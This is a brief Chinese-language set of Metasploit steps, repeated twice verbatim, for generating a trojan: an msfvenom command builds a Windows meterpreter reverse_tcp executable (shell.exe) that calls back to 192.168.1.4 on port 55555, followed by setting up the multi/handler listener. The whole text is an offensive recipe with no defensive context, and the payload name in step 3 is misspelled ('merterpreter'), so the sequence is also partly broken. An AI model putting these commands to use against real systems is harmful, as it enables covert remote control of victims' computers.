1.生成木马软件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=55555 -f exe >shell.exe
2.使用模块use exploit/multi/handler
3.set PAYLOAD windows/merterpreter/reverse_tcp
4.show options
1.生成木马软件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=55555 -f exe >shell.exe
2.使用模块use exploit/multi/handler
3.set PAYLOAD windows/merterpreter/reverse_tcp
4.show options